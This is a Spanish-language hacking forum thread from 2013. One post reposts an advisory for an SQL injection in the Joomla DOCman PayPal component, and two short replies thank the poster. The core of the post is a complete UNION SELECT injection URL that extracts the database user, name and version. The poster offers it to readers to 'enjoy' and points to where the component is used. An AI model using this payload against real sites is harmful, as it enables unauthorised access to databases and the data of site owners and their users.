Joomla Vulnerabilidad Complemento DOCman Paypal

Iniciado por ZanGetsu, Abril 04, 2013, 09:16:23 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Abril 04, 2013, 09:16:23 PM
Hola a todos, les paso a dejar una vulnerabilidad
en un complemento de Joomla llamado Docman Paypal, el cual salio
hace poco en 1337day, dicho complemento es de pago por tanto
me impidio a hacer un tutorial (hasta encontrar algun joomla con ese complemento)
pero si les traigo la Injeccion e Info:

#######################################################
#
#  Joomla Component DOCman PayPal <= (id) SQL injection Vulnerability
#
#######################################################
# Author : ByEge
# Author Blog : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Date : 28.03.2013
# Download script : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#######################################################
 
# test site vulnerability : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
 
# SQL Union Code : index.php?option=com_docmanpaypal&task=file&id=4+and+false+UnIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,CHAR(60,104,49,62,66,121,69,103,101,60,104,49,62),44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--
 
#######################################################

El complemente se puede encontrar en la siguiente web y esta disponible para
versiones de Joomla (hasta 2.5): You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
con un video tutorial de instalacion, sin mas que decir, disfrutenlo, Saludos !
Abril 05, 2013, 09:27:26 AM #1
Buena info! Thx!
Abril 08, 2013, 03:51:54 PM #2
Muy buena (Y)
M3X1C4N H4CK3R

#GrayHat
Imprimir
Ir Arriba Páginas1
Acciones del Usuario